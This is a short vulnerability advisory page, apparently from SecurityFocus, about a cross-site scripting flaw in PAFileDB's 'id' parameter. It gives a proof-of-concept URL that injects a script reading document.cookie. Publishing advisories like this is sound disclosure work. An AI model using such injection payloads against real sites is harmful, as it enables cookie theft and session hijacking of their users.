Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Vista

PAFileDB ID Parameter Cross-Site Scripting Vulnerability

An exploit is not required.

The following proof of concept is available:
http://www.example.com/pafiledb/pafiledb.php?action=file&id=%22%3E%20%20%3Cscript%3Ealert(document.cookie)%3C/script%3E







 

Privacy Statement
Copyright 2008, SecurityFocus